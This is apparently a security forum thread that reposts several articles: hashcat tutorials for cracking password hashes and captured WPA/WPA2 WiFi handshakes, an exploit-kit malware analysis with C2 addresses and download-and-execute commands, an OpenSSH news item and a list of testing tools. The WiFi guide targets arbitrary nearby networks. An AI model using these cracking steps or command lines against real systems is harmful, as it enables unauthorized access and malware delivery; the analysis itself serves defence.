Nytro

Cracking MD5, phpBB, MySQL and SHA1 passwords Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat, cudaHashcat, oclHashcat on Kali Linux Hashcat or cudaHashcat is the self-proclaimed world’s fastest CPU-based password recovery tool. Versions are available for Linux, OSX, and Windows and can come in CPU-based or GPU-based variants. Hashcat or cudaHashcat currently supports a large range of hashing algorithms, including: Microsoft LM Hashes, MD4, MD5, SHA-family, Unix Crypt formats, MySQL, Cisco PIX, and many others. Contents Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat, cudaHashcat, oclHashcat on Kali Linux My Setup NVIDIA Users: AMD Users: [*]Getting hashes: [*]Cracking hashed MD5 passwords MD5 cracking using hashcat and cudahashcat [*]Cracking hashed MD5 – phpBB passwords MD5 – phpBB cracking using hashcat and cudahashcat [*]Cracking hashed MySQL passwords MySQL hashed password cracking using hashcat and cudahashcat [*]Cracking hashed SHA1 passwords SHA1 password cracking using hashcat and cudahashcat [*]Location of Cracked passwords [*]Creating HASH’es using Kali [*]Conclusion [*]Google+ Hashcat or cudaHashcat comes in two main variants: Hashcat – A CPU-based password recovery tool oclHashcat or cudaHashcat – A GPU-accelerated tool Many of the algorithms supported by Hashcat or cudaHashcat can be cracked in a shorter time by using the well-documented GPU-acceleration leveraged in oclHashcat or cudaHashcat (such as MD5, SHA1, and others). However, not all algorithms can be accelerated by leveraging GPUs. Hashcat or cudaHashcat is available for Linux, OSX and Windows. oclHashcat or cudaHashcat is only available for Linux and Windows due to improper implementations in OpenCL on OSX. My Setup My setup is simple. I have a NVIDIA GTX 210 Graphics card in my machine running Kali Linux 1.0.6 and will use rockyou dictionary for this whole exercise. In this post, I will show How to crack few of the most common hashes MD5 MD5 – phpBB MySQL and SHA1 I will use 2 commands for every hash, hashcat and then cudahashcat. Because I am using a NVIDIA GPU, I get to use cudaHashcat. If you’re using AMD GPU, then I guess you’ll be using oclHashcat. Correct me if I am wrong here! Before you enable GPU Cracking, I’ve spent last few months writing guides on how to enable those features in Kali Linux. NVIDIA Users: Install proprietary NVIDIA driver on Kali Linux – NVIDIA Accelerated Linux Graphics Driver Install NVIDIA driver kernel Module CUDA and Pyrit on Kali Linux – CUDA, Pyrit and Cpyrit-cuda AMD Users: Install AMD ATI proprietary fglrx driver in Kali Linux 1.0.6 Install AMD APP SDK in Kali Linux Install Pyrit in Kali Linux Install CAL++ in Kali Linux AMD is currently much faster in terms of GPU cracking, but then again it really depends on your card. You can generate more hashes or collect them and attempt to crack them. Becuase I am using a dictionary, (it’s just 135MB), I am limited to selection number of passwords. The bigger your dictionary is, the more you’ll have success cracking an unknown hash. There are other ways to cracking them without using Dictionary (such as RainBow Tables etc.). I will try to cover and explain as much I can. Advanced users, I’m sure you already know these, so I would appreciate constructive comments. As always, read the manual and help file before you ask for help. Most of the things are covered in manuals and wiki available in www.hashcat.net. A big thanks goes to the Hashcat or cudaHashcat Dev team, they are the ones who created and maintained this so well. Cudos!. Getting hashes: First of all, we need to get our hashes. You can download hash generator applications, but there’s online sites that will allow you to create them. I will use InsidePro who kindly created a page that allows you create hashes on the fly and it’s publicly available. Visit them and feel free to browse their website to understand more about hashes. The password I am using is simple: abc123 All you need to do is enter this in password field of this page Hash Generator and click on generate. Cracking hashed MD5 passwords From the site, I copied the md5 hashed password and put it into a file. vi md5-1.txt cat md5-1.txt MD5 cracking using hashcat and cudahashcat Now it’s simple, I just typed in the following command and it took few seconds. hashcat -m 0 -a 0 /root/md5-1.txt /root/rockyou.txt Similarly, I can use cudahashcat. cudahashcat -m 0 -a 0 /root/md5-1.txt /root/rockyou.txt Cracking hashed MD5 – phpBB passwords From the site, copy the phpBB hashed password and put it into a file. vi md5phpbb-1.txt cat md5phpbb-1.txt What I didn’t explain in previous section, is that how do you know who mode to use or which attack code. You can type in hashcat --help or cudahashcat --help and read through it. Because I will stick with attack mode 0 (Straight Attack Mode), I just need to adjust the value for -m where you specify which type of hash is that. hashcat --help | grep php So it’s 400 MD5 – phpBB cracking using hashcat and cudahashcat Let’s adjust our command and run it. hashcat -m 400 -a 0 /root/md5phpbb-1.txt /root/rockyou.txt and cudahashcat cudahashcat -m 400 -a 0 /root/md5phpbb-1.txt /root/rockyou.txt Cracking hashed MySQL passwords Similar step, we get the file from the website and stick that into a file. vi mysql-1.txt cat mysql-1.txt NOTE: *6691484EA6B50DDDE1926A220DA01FA9E575C18A <– this was the hash from the website, remove * from this one before you save this hash. First of all let’s find out the mode we need to use for MYSQL password hashes. hashcat --help | grep My Ah, I’m not sure which one to use here … MySQL hashed password cracking using hashcat and cudahashcat I’ll try 200 and see how that goes … hashcat -m 200 -a 0 /root/mysql-1.txt /root/rockyou.txt Nope not good, Let’s try 300 this time… hashcat -m 300 -a 0 /root/mysql-1.txt /root/rockyou.txt and cudahashcat cudahashcat -m 300 -a 0 /root/mysql-1.txt /root/rockyou.txt Cracking hashed SHA1 passwords Similar step, we get the file from the website and stick that into a file. vi sha1-1.txt cat sha1-1.txt Let’s find out the mode we need to use for SHA1 password hashes. hashcat --help | grep SHA1 SHA1 password cracking using hashcat and cudahashcat We already know what to do next… hashcat -m 100 -a 0 /root/sha1-1.txt /root/rockyou.txt and cudahashcat cudahashcat -m 100 -a 0 /root/sha1-1.txt /root/rockyou.txt Location of Cracked passwords Hashcat or cudaHashcat saves all recovered passwords in a file. It will be in the same directory you’ve ran Hashcat or cudaHashcat or oclHashcat. In my case, I’ve ran all command from my home directory which is /root directory. cat hashcat.pot Creating HASH’es using Kali As always, great feedback from zimmaro, Thanks. See his comment below: (I’ve removed IP and email details for obvious reasons). dude got some massive screen!!! 1920×1080 16:9 HD 1080p!!! [TABLE] [TR] [TD]zimmaro_the_g0at <email truncated> <ip address truncared>[/TD] [TD] Submitted on 2014/03/30 at 2:43 am all always(our-friend): excellent explanation and thank you for sharing your knowledge / experiences PS:if I may some “” basic-hash “” can be generated directly with our KALI ImagesTime.com-hash.PNG [/TD] [/TR] [/TABLE] Conclusion This guide is here to show you how you can crack passwords using simple attack mode.You might ask why I showed the same command over and over again! Well, by the end of this guide, you will never forget the basics. There’s of course advanced usage, but you need to have a strong basics. I would suggest to read Wiki and Manuals from www.hashcat.net to get a better understanding of rule based attacks because that’s the biggest strength of Hashcat. The guys in Hashcat forums are very knowledgeable and know what they are doing. If you need to know anything, you MUST read manuals before you go and ask something. Usually RTFM is the first response … so yeah, tread lightly. Thanks for reading. Feel free to share this article. Sursa: Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux | blackMORE Ops

Cracking WPA WPA2 with Hashcat on Kali Linux (BruteForce MASK based attack on Wifi passwords) This entry was posted in Cracking How to Kali Linux Linux and tagged Cracking Hashcat How to Wifi on March 27, 2014 by blackMORE Ops. Cracking WPA WPA2 with Hashcat oclHashcat or cudaHashcat on Kali Linux (BruteForce MASK based attack on Wifi passwords) cudaHashcat or oclHashcat or Hashcat on Kali Linux got built-in capabilities to attack and decrypt or crack WPA WPA2 handshake .cap files. Only constraint is, you need to convert a .cap file to a .hccap file format. This is rather easy. Contents Cracking WPA WPA2 with Hashcat oclHashcat or cudaHashcat on Kali Linux (BruteForce MASK based attack on Wifi passwords) My Setup NVIDIA Users: AMD Users: [*]Why use Hashcat to crack WPA/WPA2 handshake file? Built-in charsets Numbered passwords Letter passwords – All uppercase Letter passwords – All lowercase Passwords – Lowercase letters and numbers Passwords – Uppercase letters and numbers Passwords – Mixed matched with uppercase, lowercase, number and special characters. Passwords – when you know a few characters [*]Capture handshake with WiFite [*]Cleanup your cap file using wpaclean [*]Convert .cap file to .hccap format [*]Cracking WPA/WPA2 handshake with Hashcat [*]Dictionary attack [*]Brute-Force Attack Sample: Sample .hcmask file [*]Location of Cracked passwords [*]Conclusion [*]Google+ My Setup I have a NVIDIA GTX 210 Graphics card in my machine running Kali Linux 1.0.6 and will use rockyou dictionary for most of the exercise. In this post, I will show How to crack WPA/WPA2 handshake file (.cap files) with cudaHashcat or oclHashcat or Hashcat on Kali Linux. I will use cudahashcat command because I am using a NVIDIA GPU. If you’re using AMD GPU, then I guess you’ll be using oclHashcat. Let me know if this assumptions is incorrect. To enable GPU Cracking, you need to install either CUDA for NVIDIA or AMDAPPSDK for AMD graphics cards. I’ve covered those in in my previous posts. NVIDIA Users: Install proprietary NVIDIA driver on Kali Linux – NVIDIA Accelerated Linux Graphics Driver Install NVIDIA driver kernel Module CUDA and Pyrit on Kali Linux – CUDA, Pyrit and Cpyrit-cuda AMD Users: Install AMD ATI proprietary fglrx driver in Kali Linux 1.0.6 Install AMD APP SDK in Kali Linux Install Pyrit in Kali Linux Install CAL++ in Kali Linux Why use Hashcat to crack WPA/WPA2 handshake file? Pyrit is the fastest when it comes to cracking WPA/WPA2 handshake files. So why are we using Hashcat to crack WPA/WPA2 handshake files? Because we can? Because Hashcat allows us to use customized attacks with predefined rules and Masks. Now this doesn’t explain much and reading HASHCAT Wiki will take forever to explain on how to do it. I’ll just give some examples to clear it up. Hashcat allows you to use the following built-in charsets to attack a WPA/WPA2 handshake file. Built-in charsets ?l = abcdefghijklmnopqrstuvwxyz ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ ?d = 0123456789 ?s = !”#$%&'()*+,-./:;??@[\]^_`{|}~ ?a = ?l?u?d?s Numbered passwords So lets say you password is 12345678. You can use a custom MASK like ?d?d?d?d?d?d?d?d What it means is that you’re trying to break a 8 digit number password like 12345678 or 23456789 or 01567891.. You get the idea. Letter passwords – All uppercase If your password is all letters in CAPS such as: ABCFEFGH or LKHJHIOP or ZBTGYHQS ..etc. then you can use the following MASK: ?u?u?u?u?u?u?u?u It will crack all 8 Letter passwords in CAPS. Letter passwords – All lowercase If your password is all letters in lowercase such as: abcdefgh or dfghpoiu or bnmiopty..etc. then you can use the following MASK: ?l?l?l?l?l?l?l?l It will crack all 8 Letter passwords in lowercase. I hope you now know where I am getting at. Passwords – Lowercase letters and numbers If you know your password is similar to this: a1b2c3d4 or p9o8i7u6 or n4j2k5l6 …etc. then you can use the following MASK: ?l?d?l?d?l?d?l?d Passwords – Uppercase letters and numbers If you know your password is similar to this: A1B2C3D4 or P9O8I7U6 or N4J2K5L6 …etc. then you can use the following MASK: ?u?d?u?d?u?d?u?d Passwords – Mixed matched with uppercase, lowercase, number and special characters. If you password is all random, then you can just use a MASK like the following: ?a?a?a?a?a?a?a?a Note: ?a represents anything …. I hope you’re getting the idea. If you are absolutely not sure, you can just use any of the predefined MASKs file and leave it running. But yeah, come back to check in a million years for a really long password …. Using a dictionary attack might have more success in that scenario. Passwords – when you know a few characters If you somehow know the few characters in the password, this will make things a lot faster. For every known letter, you save immense amount of computing time. MASK’s allows you to combine this. Let’s say your 8 character password starts with abc, doesn’t contain any special characters. Then you can create a MASK rule file to contain the following: abc?l?l?l?l?l abc?u?u?u?u?u abc?d?d?d?d?d abc?l?u??d??d?l abc?d?d?l?u?l There will be 125 combinations in this case. But it will surely break it in time. This is the true power of using cudaHashcat or oclHashcat or Hashcat on Kali Linux to break WPA/WPA2 passwords. You can even up your system if you know how a person combines a password. Some people always uses UPPERCASE as the first character in their passwords, few lowercase letters and finishes with numbers. Example: Abcde123 Your mask will be: ?u?l?l?l?l?d?d?d This will make cracking significantly faster. Social engineering is the key here. That’s enough with MASK’s. Now let’s capture some WPA/WPA2 handshake files. Following WiFite section was taken from a previous guide Cracking Wifi WPA/WPA2 passwords using pyrit cowpatty in Kali Linux which was one of the best guides about cracking Wifi passwords out there. Capture handshake with WiFite Why WiFite instead of other guides that uses Aircrack-ng? Because we don’t have to type in commands.. Type in the following command in your Kali Linux terminal: wifite –wpa You could also type in wifite wpa2 If you want to see everything, (wep, wpa or wpa2, just type the following command. It doesn’t make any differences except few more minutes wifite Once you type in following is what you’ll see. So, we can see bunch of Access Points (AP in short). Always try to go for the ones with CLIENTS because it’s just much faster. You can choose all or pick by numbers. See screenshot below Awesome, we’ve got few with clients attached. I will pick 1 and 2 cause they have the best signal strength. Try picking the ones with good signal strength. If you pick one with poor signal, you might be waiting a LONG time before you capture anything .. if anything at all. So I’ve picked 1 and 2. Press Enter to let WiFite do it’s magic. Once you press ENTER, following is what you will see. I got impatient as the number 1 choice wasn’t doing anything for a LONG time. So I pressed CTRL+C to quit out of it. This is actually a great feature of WIfite. It now asks me, What do you want to do? [c]ontinue attacking targets [e]xit completely. I can type in c to continue or e to exit. This is the feature I was talking about. I typed c to continue. What it does, it skips choice 1 and starts attacking choice 2. This is a great feature cause not all routers or AP’s or targets will respond to an attack the similar way. You could of course wait and eventually get a respond, but if you’re just after ANY AP’s, it just saves time. And voila, took it only few seconds to capture a handshake. This AP had lots of clients and I managed to capture a handshake. This handshake was saved in /root/hs/BigPond_58-98-35-E9-2B-8D.cap file. Once the capture is complete and there’s no more AP’s to attack, Wifite will just quit and you get your prompt back. Now that we have a capture file with handshake on it, we can do a few things. Cleanup your cap file using wpaclean Next step will be converting the .cap file to a format cudaHashcat or oclHashcat or Hashcat on Kali Linux will understand. Here’s how to do it: To convert your .cap files manually in Kali Linux, use the following command wpaclean <out.cap> <in.cap> Please note that the wpaclean options are the wrong way round. <out.cap> <in.cap> instead of <in.cap> <out.cap> which may cause some confusion. In my case, the command is as follows: wpaclean hs/out.cap hs/BigPond_58-98-35-E9-2B-8D.cap Convert .cap file to .hccap format We need to convert this file to a format cudaHashcat or oclHashcat or Hashcat on Kali Linux can understand. To convert it to .hccap format with “aircrack-ng” we need to use the -J option aircrack-ng <out.cap> -J <out.hccap> Note the -J is a capitol J not lower case j. In my case, the command is as follows: aircrack-ng hs/out.cap -J hs/out Cracking WPA/WPA2 handshake with Hashcat cudaHashcat or oclHashcat or Hashcat on Kali Linux is very flexible, so I’ll cover two most common and basic scenarios: Dictionary attack Mask attack Dictionary attack Grab some Wordlists, like Rockyou. Read this guide Cracking Wifi WPA/WPA2 passwords using pyrit cowpatty in Kali Linux for detailed instructions on how to get this dictionary file and sorting/cleaning etc. First we need to find out which mode to use for WPA/WPA2 handshake file. I’ve covered this in great length in Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux guide. Here’s a short rundown: cudahashcat --help | grep WPA So it’s 2500. Now use the following command to start the cracking process: cudahashcat -m 2500 /root/hs/out.hccap /root/rockyou.txt Bingo, I used a common password for this Wireless AP. Took me few seconds to crack it. Depending on your dictionary size, it might take a while. You should remember, if you’re going to use Dictionary attack, Pyrit would be much much much faster than cudaHashcat or oclHashcat or Hashcat. Why we are showing this here? Cause we can. Another guide explains how this whole Dictionary attack works. I am not going to explain the same thing twice here. Read Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux for dictionary related attacks in full length. Brute-Force Attack Now this is the main part of this guide. Using Brute Force MASK attack. To crack WPA WPA2 handshake file using cudaHashcat or oclHashcat or Hashcat, use the following command: Sample: cudahashcat -m 2500 -a 3 capture.hccap ?d?d?d?d?d?d?d?d Where -m = 2500 means we are attacking a WPA/WPA2 handshake file. -a = 3 means we are using Brute Force Attack mode (this is compatible with MASK attack). capture.hccap = This is your converted .cap file. We generated it using wpaclean and aircrack-ng. ?d?d?d?d?d?d?d?d = This is your MASK where d = digit. That means this password is all in numbers. i.e. 7896435 or 12345678 etc. I’ve created a special MASK file to make things faster. You should create your own MASK file in similar way I explained earlier. I’ve saved my file in the following directory as blackmoreops-1.hcmask. /usr/share/oclhashcat/masks/blackmoreops-1.hcmask Do the following to see all available default MASK files provided by cudaHashcat or oclHashcat or Hashcat: ls /usr/share/oclhashcat/masks/ In my case, the command is as follows: cudahashcat -m 2500 -a 3 /root/hs/out.hccap /usr/share/oclhashcat/masks/blackmoreops-1.hcmask Sample .hcmask file You can check the content of a sample .hcmask file using the following command: tail -10 /usr/share/oclhashcat/masks/8char-1l-1u-1d-1s-compliant.hcmask Edit this file to match your requirement, run Hashcat or cudaHashcat and let it rip. Location of Cracked passwords Hashcat or cudaHashcat saves all recovered passwords in a file. It will be in the same directory you’ve ran Hashcat or cudaHashcat or oclHashcat. In my case, I’ve ran all command from my home directory which is /root directory. cat hashcat.pot Conclusion This guide explains a lot. But you should read read Wiki and Manuals from www.hashcat.net to get a better understanding of MASK and Rule based attacks because that’s the biggest strength of Hashcat. Thanks for reading. Feel free to share this article. Sursa: Cracking WPA WPA2 with Hashcat on Kali Linux (BruteForce MASK based attack on Wifi passwords) | blackMORE Ops

[h=2][/h] Continued analysis of the LightsOut Exploit Kit At the end of March, we disclosed the coverage of an Exploit Kit we called “Hello”: VRT: Hello, a new specifically covered exploit kit, or “LightsOut”, we thought we’d do a follow up post to tear this exploit kit apart a bit more. This variant of the LightsOut exploit kit uses a number of Java vulnerabilities, and targets multiple browsers. The primary goal is to drop & execute a downloader executable, which in turn downloads and executes more malware samples. These secondary malware samples are run in a sequence, and do some information harvesting, and potentially exfiltrate the information harvested. Overall, not fun for visitors to sites compromised with the LightsOut exploit kit. Because of the number of Java vulnerabilities leveraged by this kit; it's important to keep Java updated, and make certain that outdated versions of Java aren't still sticking around on your PC. You can download a utility from Oracle to remove outdated versions of Java, referenced by this article: https://www.java.com/en/download/faq/uninstaller_toolinfo.xml. A detailed analysis on how the kit operates is below, under Browser Trajectory Analysis. Java CVEs: CVE-2013-2465 - Incorrect image channel verification (buffered image) CVE-2012-1723 - Classloader vulnerablity CVE-2013-2423 - Java Security Prompt / Warning bypass Microsoft Internet Explorer CVEs: CVE-2013-1347 - CGenericElement Object Use-After-Free Vulnerability CVE-XXXX-XXXX - Pending verification of another heap spray leveraging a use-after-free Browsers explicitly targeted: Chrome, Internet Explorer Snort SIDs that should catch parts of this kit: SIDs: 26569 through 26572, 26603 and 26668 First stage dropper: VT: https://www.virustotal.com/en/file/164de09635532bb0a4fbe25ef3058b86dac332a03629fc91095a4c7841b559da/analysis/ C&C Server: 93.171.216.118 IP Address hosting malware: 93.188.161.235 Secondary dropped malware sample sha256 hashes: 1218d79fca1aca48e13a5e6e582cdc5c4d24c3367328c56d61d975a757509335 fl.jpg ac9294849559c94d5e85cb113ce8ca61bca2e576a97a9e81f66321496ddada61 tl.jpg 5ee0761f5eda01985d5f93a5e50a1247fb5c17deba1d471b05fc09751d09a08e shot.jpg a26f3225aa7e7b5263033dee682153fb7a4332429782c5755a9eaebe8a5df095 inf.jpg JavaScript IDS evasion methods: Sample encoded string (remove all digits) from JavaScript "836f4974362o65679305r82637150N61617044a77736359m99323481e9388" becomes "forName" [h=2]Browser Trajectory Analysis[/h] [h=3]Stage 1: dtsrc.php - detect installed fonts, direct to 1st stage of exploits via IFRAME[/h] The first stage leverages a holdover technique from the Internet Explorer 6 era – the HtmlDlgSafeHelper ActiveX control; to check if a list of over 700 fonts are available to the browser. This is entirely unrelated to any compromise method, but may be a method of "fingerprinting" the installed version and language packs of Windows + Internet Explorer, based on available fonts. The list of found fonts is concatenated together, MD5 hashed, and the hash is submitted to the malicious site. [h=3]Stage 2: dtsrc.php?a=h1 - plugin detection javascript, direction to individual exploits based on browser + plugins[/h] dtsrc.php?a=h1 has JavaScript that detects the environment in the browser to determine which exploits to direct the browser to. The JavaScript is obfuscated and minified (placed all on one line -- use a beautifier utility, or something like http://jsbeautifier.org for an online version) In-lines PluginDetect JS library from PluginDetect Interesting: has unused/commented-out code for detecting Microsoft SharePoint plugins. All of the exploits are called by dynamically appending an <IFRAME> tag to the document, pointing to one of the exploit URLs. This is the common IFRAME function leveraged by the dtsrc,php?a=h1 page. Here’s the unused detection routine for SharePoint — this may be an incomplete attempt to exploit the MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free vulnerability. [h=3]Browser compromise flow:[/h] [h=4]IE 7 on XP ––> h5 exploit page, then:[/h] Java 6 update <= 32 = h7 exploit page OR Java 7 update <= 17 = h2 exploit page [h=4]IE 8 on XP ––> h6 exploit page, then:[/h] Java 6 update <= 32 = h7 exploit page OR Java 7 update <= 17 = h2 exploit page [h=4]IE 6 on XP ––> h4 exploit page, then:[/h] Java 6 update <= 32 = h7 exploit page OR Java 7 update <= 17 = h2 exploit page [h=4]Chrome on Windows ––> Java 7 update <= 7 = h3 exploit page[/h] [h=4]Any browser ––> Java 6 update <= 32 = h7 exploit page (see above screenshot)[/h] OR Java 7 update <= 17 = h2 exploit page [h=3]Stage 3: dtsrc.php?a={??} where {??} is one of the h2/h3 etc below[/h] [h=4]h2 == Java 7 update <= 17 CVE-2013-2423[/h] This uses a base64 encoded JNLP with applet parameter __applet_ssv_validated=true for the CVE-2013-2423 warning bypass Loads the r2 JAR for downloading the dropper And if we base64 decode the jnlp_embedded parameter, here’s the warning dialog bypas: [h=4]h3 == Chrome w/ Java 7 update <= 17 CVE-2013-2423[/h] Nearly exactly the same as h2 page, the JNLP is encoded/presented differently. Uses deployJava.js from java.com; deployJava.runApplet( Loads the r2 JAR for downloading the dropper And it’s the exact same base64 encoded JNLP from H2. [h=4]h4 & h5 == Microsoft Internet Explorer 6 and Windows XP[/h] Heap Spray w/ DOM use-after-free vulnerability - we have ongoing research to determine exactly which CVE it is. [h=4]h6 == Microsoft Internet Explorer 8 and Windows XP[/h] CVE-2013-1347 - CGenericElement Object Use-After-Free Vulnerability Snort SIDs: 26569 through 26572, 26603 and 26668 The code on the page is pretty much a direct rip-off of the metsploit ie_cgenericelement_uaf.rb module https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb [h=4]h7 == Java 6 update <= 32[/h] Direct <applet> loading of r7 JAR, which leverages the CVE-2012-1723 classloader confusion vulnerability [h=3] Java JAR Analysis[/h] [h=4]r2 jar - CVE-2013-2465[/h] CVE-2013-2465 is the Incorrect image channel verification (buffered image) vulnerability, which permits execution of arbitrary code. Java class grants itself full permissions via overloading java.security.AllPermission Ultimately downloads to disk and executes an executable (ntsys391.exe). This JAR has a pretty simple IDS evasion technique where it decodes the URL to download the executable at runtime, through simple XOR routine. [h=4]r7 jar - CVE-2012-1723[/h] This exploits the getClassLoader vulnerability - by modifying a class file by hand, you can confuse the Java runtime between a static variable and an instance variable. This results in code being executed outside of the java sandbox, when it hasn't been verified as safe. A Java class grants itself full permissions via overloading java.security.AllPermission One of the malicious classes in the JAR has another class embedded as a string that gets decoded and executed directly (r7-embedded.class, below) [h=4]r7-embedded.class[/h] This leverages java.security.PrivilegedExceptionAction When successful, it downloads an executable from a hardcoded url to the Java temp dir, and saves the file as ntsys391.exe. The hard-coded URL is the same .php file as the rest of the exploit kit including the fully qualified domain name. This may mean the exploit kit is rebuilt for each compromised host, or the r7 jar is dynamically built for each request by PHP. [h=3]Stage 4 - the dropped executable - which is a dropper as well[/h] Either one of the Java vulnerabilities or the heap spray in Microsoft Internet Explorer requests dtsrc.php?a=dwe, which is saved to disk as ntsys391.exe ntsys391.exe downloads additional executables, the .jpg URLs referenced below under “Network Indicators” [h=3]Host Indicators[/h] First stage dropper: - initially dropped as ntsys391.exe SHA: D667833E4915C385321B553785732BBED3009C2A SHA256: 164de09635532bb0a4fbe25ef3058b86dac332a03629fc91095a4c7841b559da [*]Copies/Renames self as C:\Documents and Settings\Administrator\Application Data\ Broker services\WbemMonitor .exe [*]Runs self: "WbemMonitor .exe -fst” [*]Phones home to C2 w/ a POST request (see “Network Indicators” below) to retrieve other executables to download. [*]Retrieves shot.jpg, which is actually an EXE -> C:\Documents and Settings\Administrator\Application Data\ Broker services\plugs\mmc.exe SHA: 334eeaf5ea3920b612b4e26bbe3e0cccbc431c2e SHA256: 5ee0761f5eda01985d5f93a5e50a1247fb5c17deba1d471b05fc09751d09a08e [h=3]Network Indicators[/h] Contacts 93.171.216.118 Request: (Analyst Note: notice — no User-Agent header, HTTP/1.1 to a dotted quad) POST /check_value.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 93.171.216.118 Content-Length: 42 Connection: Keep-Alive Cache-Control: no-cache [*]Post Body: identifiant=51032_2161380123730&version=2. Response: (Analyst Note: broken apart for readability - this was originally all on one line - lines delimited by a ; character, and trivally defanged) work:3|downexec hxxp://93.188.161[.]235/check2/muees27jxt/shot.jpg; work:5|downexec hxxp://93.188.161[.]235/check2/muees27jxt/tl.jpg; work:7|downexec hxxp://93.188.161[.]235/check2/muees27jxt/fl.jpg; work:290|downexec hxxp://93.188.161[.]235/check2/muees27jxt/inf.jpg; 93.188.161.235 Request (Analyst Note: this kit only returns the JPG if the user-agent matches the string below, HTTP/1.1 to a dotted quad) GET /check2/muees27jxt/shot.jpg HTTP/1.1 User-Agent: User-Agent: Opera/10.35 Presto/2.2.30 Host: 93.188.161.235 Cache-Control: no-cache [*]Response: PE executable Written by Richard Harman at 1:24 PM Sursa: VRT: Continued analysis of the LightsOut Exploit Kit

[h=2]OpenSSH not anymore depending on OpenSSL[/h]May 3rd, 2014 Mourad Ben Lakhoua OpenSSH is an important set of programs that is used to encrypt communication and connect to servers over SSH. This is the standard way used by many system administrators to remotely manage thousands of servers. For long time developers have planned to remove the OpenSSL package as this is not required for the communication and protocol functionality but they use the crypto of OpenSSL. Now and starting with the next version of OpenSSH it is possible to have the package compiled with the key make OPENSSL = no, to remove the OpenSSL dependencies. According to the release notes with this setting administrator reduce certain set of cryptographic standards from the old protocol SSH- 1 (that include algorithms to curve25519, aes-ctr, chacha, ed25519). The protocol that should be used is SSH- 2 that comes to add more security and is more reliable while I think that the first version is not anymore used. By this new release it will be important to directly exclude OpenSSL and any other package that is not used to reduce the vulnerability surface in your infrastructure. OpenBSD and OpenSSH developers have recently launched a project called LibreSSL that comes to clean OpenSSL code from glitches and security troubles especially after the critical Heartbleed vulnerability which left 2/3 websites in the cyberspace vulnerable for more than 2 years. Sursa: OpenSSH not anymore depending on OpenSSL | SecTechno

The main purpose of this section is to provide programs skeletons for research and beta or partial toolz. Rarely updated and not intended for real usage or for the common users... aluigifuzz 0.3 (aluigifuzz) this is the dumb file mutation fuzzer I wrote in 2011 for my personal usage and was incredibly useful at that time. I have decided to release it because I no longer use it, read aluigifuzz.txt for additional information and examples. Offbreak (offbreak) useful tool to track the operations performed by a program on a file at a given offset (hosted on ReVuln). UDPSZ 0.3.4 (udpsz) tool for sending UDP, TCP or any other type of packet with custom size, content, source port and IP address (spoofing, where possible). its options are very useful for more specific tests but not much easy to use (chaotics), that's why the -d option is suggested to check if the output packets have really the desired format. note that this tool has been written for myself so it acts mainly as a generic proof-of-concept for everything I want to test and prove. One file only web/ftp server 0.6.1 (onlywebs) multi-thread web and FTP server written to provide ever the same file without writing/listing/indexing features of such protocols, but now it's able to do many interesting things useful for my tests. it has various crazy options for testing purposes, so do NOT use it except if I specify it in my advisories. partially compatible with the following protocols: HTTP, FTP, WebDav, RTSP. mygrep 0.1 (mygrep) useful tool for scanning files and folders searching strings (C syntax supported) as binary patterns, utf16 unicode, base64, hex and other methods. example: mygrep "\x08\x00\x00\x00mystring" file.txt folder\folder c:\path1 Generic FTP PASV ports consumption 0.1 (ftpports) simple tool for sending endless PASV commands to FTP servers, it has been created as PoC for a bug in Serv-U FTP 11.1.0.3. UDD files quick informations 0.1 (uddinfo) quick and basic tool which show some information contained in the UDD files used in Ollydbg like the various breakpoints and the comments. Webservers char tester 0.1.1 (webtestchr) a simple tool which has been very useful in all this time for the blind and quick testing of some vulnerabilities in software that uses the HTTP protocol. practically it scans all the 255 ascii chars and put them in some particular locations of the URI like before and after the slash or at the end of the URI and so on. usually the types of vulnerabilities which can be tested through this method are source disclosure (like for php and cgi files), security bypass (like folders or files which require specific rights or password), possible exceptions and others all dependent by the program to test. one of the recent advisories in which this tool was helpful was the source disclosure in Ruby WEBrick. FindBits 0.2.2a (findbits) simple and useful tool for analyzing a given file to search if exist text strings or bytes which are packed in bitstreams. the tool can be even used to read and visualize a custom amount of bits, for example using the option -s "1 4 32 1000" the tool will visualize the hexadecimal, string, decimal and binary values of the first 1, 4 and 32 bits of the file and the hex dump of the subsequent 1000 bits. some examples of game protocols which use the bitstreams are the Unreal engine and the Battlefield series. loDNS 0.1.1 (lodns) simple tool I wrote for my tests which emulates a basic DNS server and logs all the hostnames in the received requests and then replies with a fixed IP address (A type). it uses 127.0.0.1 as default IP address in which resolving the hostnames but it can be changed at command-line, if it's used the IP 0.0.0.0 the tool will not reply (monitoring only) while if you use 255.255.255.255 it will act like a proxy. it's a good way for resolving unknown hostnames locally while testing a program, it's only needed to set 127.0.0.1 as primary DNS and launching loDNS. TFTP server tester 0.2a (tftpx) nice tool that acts like TFTP client with some advanced feature. Generic custom HTTP file uploader 0.2a (myhttpup) simple tool for uploading files (POST + mime) choosing the name of the destination file, useful for testing directory traversal vulnerabilities in web servers and components which allow to upload files. Unreal engine test server 0.1 (unrealts) basic way for emulating an Unreal server and testing the sending of commands to a connected client Quake 3 engine "connect" modifier 0.2 (q3conmod_sudp) plugin for sudppipe which allows a simple customization of the "connect" packet for the games which use the Quake 3 engine: sudppipe -l q3conmod_sudp.dll -L "\parameter1\value1\parameter2\value2" IP PORT 1234 (use -L "" for the runtime help) then from the console of the game type: connect 127.0.0.1:1234 the following is an example for joining a server which uses PunkBuster with PB disabled (the client will be kicked after some seconds/minutes): sudppipe -l q3conmod_sudp.dll -L "\cl_punkbuster\1" SERVER PORT 1234 then from the client: pb_cl_disable connect 127.0.0.1:1234 Dumproc 0.1.1 (dumproc) simple process dumper for both Windows and Linux. Live for Speed demo/S1/S2 packets modifier example 0.1 (lfsanus) useless and basic proxy tool for modifying the packets of this game, old stuff written just for fun. Tcpdump format UDP 2 TCP converter 0.1.1 (pcapu2t) simple tool written for converting the UDP packets of a PCAP file in a TCP stream, useful for tracking the packets flow with Wireshark. no longer needed because Wireshark implemented the following of the UDP packets various versions ago. WAVEhead 0.1 (wavehead) experimental and useless tool for adding a wave header to raw files or for modifying existent wave headers (mainly for uncompressed files) or extracting the raw audio 